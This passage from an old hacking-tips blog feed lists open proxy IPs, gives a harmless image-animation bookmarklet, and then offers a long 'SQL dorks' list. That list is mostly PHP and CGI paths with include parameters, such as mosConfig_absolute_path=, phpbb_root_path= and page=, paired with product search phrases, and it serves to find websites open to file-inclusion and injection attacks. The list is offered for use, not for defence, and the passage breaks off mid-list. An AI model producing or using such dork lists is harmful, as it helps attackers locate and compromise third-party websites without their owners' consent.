204);"&gt;12.150.153.195:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.14.255.103:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.165.33.15:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.139.64.223:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.0.249.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.82.232.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.62.128.38:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;111.223.183.66:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.181.12.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.181.0.155:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.122.88.4:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.122.88.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.122.87.24:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;117.52.111.207:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;116.236.113.253:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;116.125.28.99:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;115.146.30.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;115.113.116.207:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;114.130.13.233:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;114.106.142.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;105.154.197.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;109.96.25.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;108.226.175.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;108.209.240.103:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.34.41.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.34.118.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;109.70.66.180:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;103.29.191.108:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;107.14.224.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;105.90.157.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;104.247.151.246:80&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-4952925914826864153?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/4952925914826864153/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/proxy-list-daily-updated.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4952925914826864153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/4952925914826864153'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/proxy-list-daily-updated.html' title='PROXY LIST DAILY UPDATED'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-1145545713845766228</id><published>2010-08-04T11:15:00.000-07:00</published><updated>2010-08-04T11:19:10.632-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>GOOGLE IMAGE TRICKS</title><content type='html'>    &lt;!-- Start Member Post --&gt;    &lt;!-- google_ad_section_start --&gt;        &lt;strong&gt;1.&lt;/strong&gt; open google&lt;br /&gt;&lt;b&gt;2&lt;/b&gt;. Click "images"&lt;br /&gt;&lt;b&gt;3.&lt;/b&gt; find any image&lt;br /&gt;&lt;b&gt;4.&lt;/b&gt; You will get a page with a lot of images thumbnailed.&lt;br /&gt;&lt;b&gt;5.&lt;/b&gt; Now delete the URL on the address bar&lt;br /&gt;&lt;b&gt;6. &lt;/b&gt;Copy the script down here, and paste it in your address bar!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre style="color: rgb(51, 102, 255);" class="BBcode"&gt;javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images ; DIL=DI.length; function A(){for(i=0; i&lt;DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math. sin(R*x1+ i*x2+x3)* x4+x5; DIS.top=Math. cos(R*y1+ i*y2+y3)* y4+y5}R++ }setInterval('A()',5); void(0)&lt;br /&gt;&lt;dil; dis="DI[" position="'absolute';" left="Math." top="Math."&gt; &lt;table width="99%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;pre class="BBcode"&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/dil;&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-1145545713845766228?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/1145545713845766228/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/google-image-tricks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1145545713845766228'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/1145545713845766228'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/google-image-tricks.html' title='GOOGLE IMAGE TRICKS'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-8262867164714691855</id><published>2010-08-04T02:55:00.000-07:00</published><updated>2010-08-04T02:56:07.425-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><title type='text'>SOME MORE SQL DORKS</title><content type='html'>M.php?my="&lt;br /&gt;.php?a="&lt;br /&gt;.php?f="&lt;br /&gt;.php?z="&lt;br /&gt;.php?zo="&lt;br /&gt;.php?la="&lt;br /&gt;.php?perm="&lt;br /&gt;.php?item_id="&lt;br /&gt;.php?f_content="&lt;br /&gt;.php?from="&lt;br /&gt;.php?mid="&lt;br /&gt;.php?lest="&lt;br /&gt;.php?east="&lt;br /&gt;.gov.br/index.php?arquivo=&lt;br /&gt;index.php?ver=&lt;br /&gt;/contenido/classes/class.inuse.php&lt;br /&gt;news.php?CONFIG[script_path]=&lt;br /&gt;index.php?vpagina=&lt;br /&gt;index.php?arq=&lt;br /&gt;index.php?pg_ID=&lt;br /&gt;index.php?pg=&lt;br /&gt;home.php?page=&lt;br /&gt;*/newbb/print.php?forum=*topic_id=*"&lt;br /&gt;*/newbb_plus/*="&lt;br /&gt;*/news/archive.php?op=*year=*month=*"&lt;br /&gt;.php?abrir="&lt;br /&gt;.php?act="&lt;br /&gt;.php?action="&lt;br /&gt;.php?ad="&lt;br /&gt;.php?archive="&lt;br /&gt;.php?area="&lt;br /&gt;.php?article="&lt;br /&gt;.php?b="&lt;br /&gt;*/tsep/include/colorswitch.php?tsep_config[absPath]=*"&lt;br /&gt;.php?back="&lt;br /&gt;.php?base="&lt;br /&gt;.php?basedir="&lt;br /&gt;.php?bbs="&lt;br /&gt;.php?board_no="&lt;br /&gt;.php?body="&lt;br /&gt;.php?c="&lt;br /&gt;.php?cal_dir="&lt;br /&gt;.php?cat="&lt;br /&gt;/include/init.inc.php?CPG_M_DIR="&lt;br /&gt;/includes/mx_functions_ch.php?phpbb_root_path="&lt;br /&gt;/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]="&lt;br /&gt;.php?_REQUEST=&amp;amp;_REQUEST[option]=com_content&amp;amp;_REQUEST[Itemid]=1&amp;amp;GLOBALS=&amp;amp;mosConfig_absolute_path="&lt;br /&gt;.php?subd="&lt;br /&gt;.php?subdir="&lt;br /&gt;.php?category="&lt;br /&gt;.php?choice="&lt;br /&gt;.php?class="&lt;br /&gt;.php?club_id="&lt;br /&gt;.php?cod.tipo="&lt;br /&gt;.php?cod="&lt;br /&gt;.php?conf="&lt;br /&gt;.php?configFile="&lt;br /&gt;.php?cont="&lt;br /&gt;.php?corpo="&lt;br /&gt;.php?cvsroot="&lt;br /&gt;.php?d="&lt;br /&gt;.php?da="&lt;br /&gt;.php?date="&lt;br /&gt;.php?debug="&lt;br /&gt;.php?debut="&lt;br /&gt;.php?default="&lt;br /&gt;.php?destino="&lt;br /&gt;.php?dir="&lt;br /&gt;.php?display="&lt;br /&gt;.php?file_id="&lt;br /&gt;.php?file="&lt;br /&gt;.php?filepath="&lt;br /&gt;.php?flash="&lt;br /&gt;.php?folder="&lt;br /&gt;.php?for="&lt;br /&gt;.php?form="&lt;br /&gt;.php?formatword="&lt;br /&gt;.php?funcao="&lt;br /&gt;.php?function="&lt;br /&gt;.php?g="&lt;br /&gt;.php?get="&lt;br /&gt;.php?go="&lt;br /&gt;.php?gorumDir="&lt;br /&gt;.php?goto="&lt;br /&gt;.php?h="&lt;br /&gt;.php?headline="&lt;br /&gt;.php?i="&lt;br /&gt;.php?inc="&lt;br /&gt;.php?include="&lt;br /&gt;.php?includedir="&lt;br /&gt;.php?inter="&lt;br /&gt;.php?itemid="&lt;br /&gt;.php?j="&lt;br /&gt;.php?join="&lt;br /&gt;.php?jojo="&lt;br /&gt;.php?l="&lt;br /&gt;.php?lan="&lt;br /&gt;.php?lang="&lt;br /&gt;.php?link="&lt;br /&gt;.php?load="&lt;br /&gt;.php?loc="&lt;br /&gt;.php?m="&lt;br /&gt;.php?main="&lt;br /&gt;.php?meio.php="&lt;br /&gt;.php?meio="&lt;br /&gt;.php?menu="&lt;br /&gt;.php?menuID="&lt;br /&gt;.php?mep="&lt;br /&gt;.php?month="&lt;br /&gt;.php?mostra="&lt;br /&gt;.php?n="&lt;br /&gt;.php?name="&lt;br /&gt;.php?nav="&lt;br /&gt;.php?new="&lt;br /&gt;.php?news="&lt;br /&gt;.php?next="&lt;br /&gt;.php?nextpage="&lt;br /&gt;.php?o="&lt;br /&gt;.php?op="&lt;br /&gt;.php?open="&lt;br /&gt;.php?option="&lt;br /&gt;.php?origem="&lt;br /&gt;.php?Page_ID="&lt;br /&gt;.php?pageurl="&lt;br /&gt;.php?para="&lt;br /&gt;.php?part="&lt;br /&gt;.php?pg="&lt;br /&gt;.php?pid="&lt;br /&gt;.php?place="&lt;br /&gt;.php?play="&lt;br /&gt;.php?plugin="&lt;br /&gt;.php?pm_path="&lt;br /&gt;.php?pollname="&lt;br /&gt;.php?post="&lt;br /&gt;.php?pr="&lt;br /&gt;.php?prefix="&lt;br /&gt;.php?prefixo="&lt;br /&gt;.php?q="&lt;br /&gt;.php?redirect="&lt;br /&gt;.php?ref="&lt;br /&gt;.php?refid="&lt;br /&gt;.php?regionId="&lt;br /&gt;.php?release_id="&lt;br /&gt;.php?release="&lt;br /&gt;.php?return="&lt;br /&gt;.php?root="&lt;br /&gt;.php?S="&lt;br /&gt;.php?searchcode_id="&lt;br /&gt;.php?sec="&lt;br /&gt;.php?secao="&lt;br /&gt;.php?sect="&lt;br /&gt;.php?sel="&lt;br /&gt;.php?server="&lt;br /&gt;.php?servico="&lt;br /&gt;.php?sg="&lt;br /&gt;.php?shard="&lt;br /&gt;.php?show="&lt;br /&gt;.php?sid="&lt;br /&gt;.php?site="&lt;br /&gt;.php?sourcedir="&lt;br /&gt;.php?start="&lt;br /&gt;.php?storyid="&lt;br /&gt;.php?str="&lt;br /&gt;.php?subject="&lt;br /&gt;.php?sufixo="&lt;br /&gt;.php?systempath="&lt;br /&gt;.php?t="&lt;br /&gt;.php?task="&lt;br /&gt;.php?teste="&lt;br /&gt;.php?theme_dir="&lt;br /&gt;.php?thread_id="&lt;br /&gt;.php?tid="&lt;br /&gt;.php?title="&lt;br /&gt;.php?to="&lt;br /&gt;.php?topic_id="&lt;br /&gt;.php?type="&lt;br /&gt;.php?u="&lt;br /&gt;.php?url="&lt;br /&gt;.php?urlFrom="&lt;br /&gt;.php?v="&lt;br /&gt;.php?var="&lt;br /&gt;.php?vi="&lt;br /&gt;.php?view="&lt;br /&gt;.php?visual="&lt;br /&gt;.php?wPage="&lt;br /&gt;.php?y="&lt;br /&gt;/components/com_forum/download.php?phpbb_root_path= com_forum&lt;br /&gt;[Script Path]/admin/index.php?o= admin/index.php"&lt;br /&gt;/admin/index.php?o= admin/index.php"&lt;br /&gt;index.php?menu=deti&amp;amp;page= index.php?menu=deti&amp;amp;page"&lt;br /&gt;include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter&lt;br /&gt;/classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"&lt;br /&gt;components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&lt;br /&gt;index.php?RP_PATH= reviewpost&lt;br /&gt;index.php?pagename= phpquiz&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/&lt;br /&gt;/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar&lt;br /&gt;components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"&lt;br /&gt;/tools/send_reminders.php?includedir= day.php?date=&lt;br /&gt;SQuery/lib/gore.php?libpath= "/SQuery/"&lt;br /&gt;m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?&lt;br /&gt;wamp_dir/setup/yesno.phtml?no_url= "setup"&lt;br /&gt;components/com_forum/download.php?phpbb_root_path= "com_forum"&lt;br /&gt;index.php?p= "/index.php?p=*.php"&lt;br /&gt;index.php?pag= "/index.php?pag=*.php"&lt;br /&gt;template.php?page= "/template.php?page=*.php"&lt;br /&gt;main.php?page= "/main.php?page=*.php"&lt;br /&gt;index2.php?pag= "/index2.php?pag=*.php"&lt;br /&gt;home.php?pag= "/home.php?pag=*.php"&lt;br /&gt;index.php?page= "/index.php?page=*.php"&lt;br /&gt;default.php?page= "/default.php?page=*.php"&lt;br /&gt;inc/cmses/aedatingCMS.php?dir[inc]= "flashchat"&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root= vwar&lt;br /&gt;bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum&lt;br /&gt;encapscms_PATH/core/core.php?root= encapscms_PATH&lt;br /&gt;inc/session.php?sessionerror=0〈= inc&lt;br /&gt;path/index.php?function=custom&amp;amp;custom= path&lt;br /&gt;[MyAlbum_DIR]/language.inc.php?langs_dir= [MyAlbum_DIR]&lt;br /&gt;/inc/irayofuncs.php?irayodirhack= "/inc/"&lt;br /&gt;index.php?function=custom&amp;amp;custom= custom&lt;br /&gt;cyberfolio/portfolio/msg/view.php?av= cyberfolio&lt;br /&gt;/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT= CFG_PHPGIGGLE_ROOT&lt;br /&gt;*mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=&lt;br /&gt;*pivot/modules/module_db.php?pivot_path=&lt;br /&gt;*inc/header.php/step_one.php?server_inc=&lt;br /&gt;*inst/index.php?lng=../../include/main.inc&amp;amp;G_PATH=&lt;br /&gt;*inc/pipe.php?HCL_path=&lt;br /&gt;*include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;*includes/header.php?systempath=&lt;br /&gt;*support/mailling/maillist/inc/initdb.php?absolute_path=&lt;br /&gt;*coppercop/theme.php?THEME_DIR=&lt;br /&gt;*zentrack/index.php?configFile=&lt;br /&gt;*include/write.php?dir=&lt;br /&gt;include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;includes/header.php?systempath=&lt;br /&gt;support/mailling/maillist/inc/initdb.php?absolute_path=&lt;br /&gt;coppercop/theme.php?THEME_DIR=&lt;br /&gt;becommunity/community/index.php?pageurl=&lt;br /&gt;shoutbox/expanded.php?conf=&lt;br /&gt;agendax/addevent.inc.php?agendax_path=&lt;br /&gt;myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;yabbse/Sources/Packages.php?sourcedir=&lt;br /&gt;zboard/zboard.php&lt;br /&gt;path_of_cpcommerce/_functions.php?prefix&lt;br /&gt;dotproject/modules/tasks/viewgantt.php?root_dir=&lt;br /&gt;My_eGery/public/displayCategory.php?basepath=&lt;br /&gt;modules/My_eGery/public/displayCategory.php?basepath=&lt;br /&gt;modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=&lt;br /&gt;modules/xgery/upgrade_album.php?GERY_BASEDIR=&lt;br /&gt;modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;pivot/modules/module_db.php?pivot_path=&lt;br /&gt;library/editor/editor.php?root=&lt;br /&gt;library/lib.php?root=&lt;br /&gt;e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;main.php?x=&lt;br /&gt;main.php?page=&lt;br /&gt;*default.php?page=&lt;br /&gt;*default.php?body=&lt;br /&gt;default.php?page=&lt;br /&gt;*index.php?url=&lt;br /&gt;*index.php?arquivo=&lt;br /&gt;index.php?meio.php=&lt;br /&gt;index.php?include=&lt;br /&gt;index.php?open=&lt;br /&gt;index.php?visualizar=&lt;br /&gt;index.php?pagina=&lt;br /&gt;index.php?inc=&lt;br /&gt;index.php?page=&lt;br /&gt;index.php?pag=&lt;br /&gt;index.php?p=&lt;br /&gt;index.php?content=&lt;br /&gt;index.php?cont=&lt;br /&gt;index.php?c=&lt;br /&gt;index.php?meio=&lt;br /&gt;index.php?x=&lt;br /&gt;index.php?cat=&lt;br /&gt;index.php?site=&lt;br /&gt;index.php?configFile=&lt;br /&gt;index.php?action=&lt;br /&gt;index.php?do=&lt;br /&gt;index2.php?x=&lt;br /&gt;Index.php?id=&lt;br /&gt;index2.php?content=&lt;br /&gt;template.php?pagina&lt;br /&gt;inc/step_one_tables.php?server_inc=&lt;br /&gt;phpshop/index.php?base_dir=&lt;br /&gt;admin.php?cal_dir=&lt;br /&gt;path_of_cpcommerce/_functions.php?prefix=&lt;br /&gt;contacts.php?cal_dir=&lt;br /&gt;convert-date.php?cal_dir=&lt;br /&gt;album_portal.php?phpbb_root_path=&lt;br /&gt;mainfile.php?MAIN_PATH=&lt;br /&gt;dotproject/modules/files/index_table.php?root_dir=&lt;br /&gt;html/affich.php?base=&lt;br /&gt;gery/init.php?HTTP_POST_VARS=&lt;br /&gt;pm/lib.inc.php?pm_path=&lt;br /&gt;ideabox/include.php?gorumDir=&lt;br /&gt;modules/tasks/viewgantt.php?root_dir=&lt;br /&gt;cgi-bin/index.cgi?page=&lt;br /&gt;cgi-bin/awstats.pl?update=1&amp;amp;logfile=&lt;br /&gt;cgi-bin/awstats/awstats.pl?configdir&lt;br /&gt;cgi-bin/ikonboard.cgi&lt;br /&gt;cgi-bin/acart/acart.pl?&amp;amp;page=&lt;br /&gt;cgi-bin/quikstore.cgi?category=&lt;br /&gt;cgi-bin/ubb/ubb.cgi?g=&lt;br /&gt;cgi-bin/hinsts.pl?&lt;br /&gt;cgi-bin/bp/bp-lib.pl?g=&lt;br /&gt;ccbill/whereami.cgi?g=ls&lt;br /&gt;cgi-bin/telnet.cgi&lt;br /&gt;cgi-bin/1/cmd.cgi&lt;br /&gt;encore/forumcgi/display.cgi?preftemp=temp&amp;amp;page=anonymous&amp;amp;file=&lt;br /&gt;cgi-sys/guestbook.cgi?user=cpanel&amp;amp;template=&lt;br /&gt;account.php?action= account.php?action=&lt;br /&gt;account.php?action= iurl:"account.php?action="&lt;br /&gt;account.php?action= iurl:".php?action="&lt;br /&gt;account.php?action= .php?action=&lt;br /&gt;accounts.php?command= .php?command="&lt;br /&gt;addmedia.php?factsfile[$LANGUAGE]= phpGedView&lt;br /&gt;.php?p="&lt;br /&gt;announcements.php?phpraid_dir= "phpraid"&lt;br /&gt;announcements.php?phpraid_dir= "phpraid signup"&lt;br /&gt;announcements.php?phpraid_dir= php raid&lt;br /&gt;announcements.php?phpraid_dir= phpraid&lt;br /&gt;announcements.php?phpraid_dir= phpraid signup&lt;br /&gt;arg.php?arg= .php?arg=&lt;br /&gt;args.php?arg= .php?arg=&lt;br /&gt;atom.php5?page= .php5?id=&lt;br /&gt;auto.php?inc= .php?inc="&lt;br /&gt;auto.php?page= auto.php?page=&lt;br /&gt;base.php?f1= base.php?f1="&lt;br /&gt;base.php?f1= .php?f1="&lt;br /&gt;board.php?see= board.php?see="&lt;br /&gt;board.php?see= .php?see="&lt;br /&gt;book.php5?page= php5?page=&lt;br /&gt;/calendar.php?l= calendar.php?l="&lt;br /&gt;/calendar.php?l= calendar.php?l=&lt;br /&gt;/calendar.php?p= calendar.php?p="&lt;br /&gt;/calendar.php?p= calendar.php?p=&lt;br /&gt;/calendar.php?pg= calendar.php?pg="&lt;br /&gt;/calendar.php?pg= calendar.php?pg=&lt;br /&gt;/calendar.php?s= calendar.php?s="&lt;br /&gt;/calendar.php?s= calendar.php?s=&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;amp;thispath= /ubbthreads/"&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;amp;thispath= /ubbthreads/&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;amp;thispath= "/ubbthreads/"&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;amp;thispath= "ubbthreads"&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;amp;thispath= ubbthreads&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository"&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_remository&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "Mambo"&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Mambo&lt;br /&gt;/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= com_serverstat&lt;br /&gt;/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= "com_serverstat"&lt;br /&gt;canal.php?meio= .php?meio="&lt;br /&gt;/classes/adodbt/sql.php?classes_dir= "adobt"&lt;br /&gt;/classes/adodbt/sql.php?classes_dir= adobt&lt;br /&gt;/classes/adodbt/sql.php?classes_dir= adobt&lt;br /&gt;/classified_right.php?language_dir= "classified.php"&lt;br /&gt;/classified_right.php?language_dir= classified.php&lt;br /&gt;/classified_right.php?language_dir= classified.php phpbazar&lt;br /&gt;/classified_right.php?language_dir= "phpbazar"&lt;br /&gt;/classified_right.php?language_dir= phpbazar&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN"&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN 1.2.3"&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN 1.2.3&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= powered by phpCOIN 1.2.3&lt;br /&gt;/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&lt;br /&gt;/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= "com_extended_registration"&lt;br /&gt;/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&lt;br /&gt;/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms"&lt;br /&gt;/components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms"&lt;br /&gt;/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms&lt;br /&gt;components/com_performs/performs.php?mosConfig_absolute_path= com_performs&lt;br /&gt;components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"&lt;br /&gt;/components/com_zoom/includes/database.php?mosConfig_absolute_path= "com_zoom"&lt;br /&gt;/components/com_zoom/includes/database.php?mosConfig_absolute_path= com_zoom&lt;br /&gt;/components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"&lt;br /&gt;content.php?page= "content.php?page=*.php"&lt;br /&gt;/embed/day.php?path= "Calendar"&lt;br /&gt;/embed/day.php?path= Calendar&lt;br /&gt;/embed/day.php?path= intitle:"Login to Calendar"&lt;br /&gt;/embed/day.php?path= "Login to Calendar"&lt;br /&gt;/embed/day.php?path= Login to Calendar&lt;br /&gt;/embed/day.php?path= "WebCalendar"&lt;br /&gt;/embed/day.php?path= WebCalendar&lt;br /&gt;enc/content.php?Home_Path= "doodle"&lt;br /&gt;enc/content.php?Home_Path= doodle&lt;br /&gt;enc/content.php?Home_Path= "doodle cart"&lt;br /&gt;enc/content.php?Home_Path= doodle cart&lt;br /&gt;enc/content.php?Home_Path= "powered by doodle cart"&lt;br /&gt;enc/content.php?Home_Path= powered by doodle cart&lt;br /&gt;/header.php?abspath= "MobilePublisherPHP"&lt;br /&gt;/header.php?abspath= MobilePublisherPHP&lt;br /&gt;impex/ImpExData.php?systempath= intext:powered by vbulletin&lt;br /&gt;impex/ImpExData.php?systempath= powered by vbulletin&lt;br /&gt;impex/ImpExData.php?systempath= "vbulletin"&lt;br /&gt;impex/ImpExData.php?systempath= vbulletin&lt;br /&gt;/includes/dbal.php?eqdkp_root_path= "EQdkp"&lt;br /&gt;/includes/dbal.php?eqdkp_root_path= EQdkp&lt;br /&gt;/includes/dbal.php?eqdkp_root_path= "powered by EQdkp"&lt;br /&gt;/includes/dbal.php?eqdkp_root_path= powered by EQdkp&lt;br /&gt;/includes/kb_constants.php?module_root_path= "Base"&lt;br /&gt;/includes/kb_constants.php?module_root_path= Base&lt;br /&gt;/includes/kb_constants.php?module_root_path= "Knowledge"&lt;br /&gt;/includes/kb_constants.php?module_root_path= Knowledge&lt;br /&gt;/includes/kb_constants.php?module_root_path= "Knowledge Base"&lt;br /&gt;/includes/kb_constants.php?module_root_path= Knowledge Base&lt;br /&gt;/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"&lt;br /&gt;/includes/kb_constants.php?module_root_path= Powered by Knowledge Base&lt;br /&gt;index1.php?= "index1.php?="&lt;br /&gt;index1.php?= index1.php?=&lt;br /&gt;index1.php?= "index1.php?=*.php?&lt;br /&gt;index2.php?= "index2.php?="&lt;br /&gt;index2.php?= index2.php?=&lt;br /&gt;index2.php?= "index2.php?=*.php?"&lt;br /&gt;index.php?body= index.php?body=&lt;br /&gt;index.php?body= "index.php?body="&lt;br /&gt;index.php?go1= index.php?go1=&lt;br /&gt;index.php?go1= "index.php?go1="&lt;br /&gt;index.php?go= "index.php?go="&lt;br /&gt;index.php?go= index.php?go=&lt;br /&gt;index.php?pageurl= "index.php?pageurl="&lt;br /&gt;index.php?pageurl= "index.php?pageurl=*.php"&lt;br /&gt;index.php?pageurl= index.php?pageurl=*.php&lt;br /&gt;index.php?pageurl= "index.php?pageurl=*.php&lt;br /&gt;index.php?pagina1= "index.php?pagina1="&lt;br /&gt;index.php?pagina1= index.php?pagina1=&lt;br /&gt;index.php?pagina= "index.php?pagina="&lt;br /&gt;index.php?pagina= "index.php?pagina=*.php"&lt;br /&gt;index.php?site1= index.php?site1=&lt;br /&gt;index.php?site1= "index.php?site1="&lt;br /&gt;index.php?site= "index.php?site="&lt;br /&gt;index.php?site= index.php?site=&lt;br /&gt;index.php?var1= "index.php?var1="&lt;br /&gt;index.php?var1= index.php?var1=&lt;br /&gt;index.php?var2= index.php?var2=&lt;br /&gt;index.php?var= index.php?va21=&lt;br /&gt;index.php?var= index.php?var=&lt;br /&gt;index.php?var= "index.php?var1="&lt;br /&gt;index.php?var= 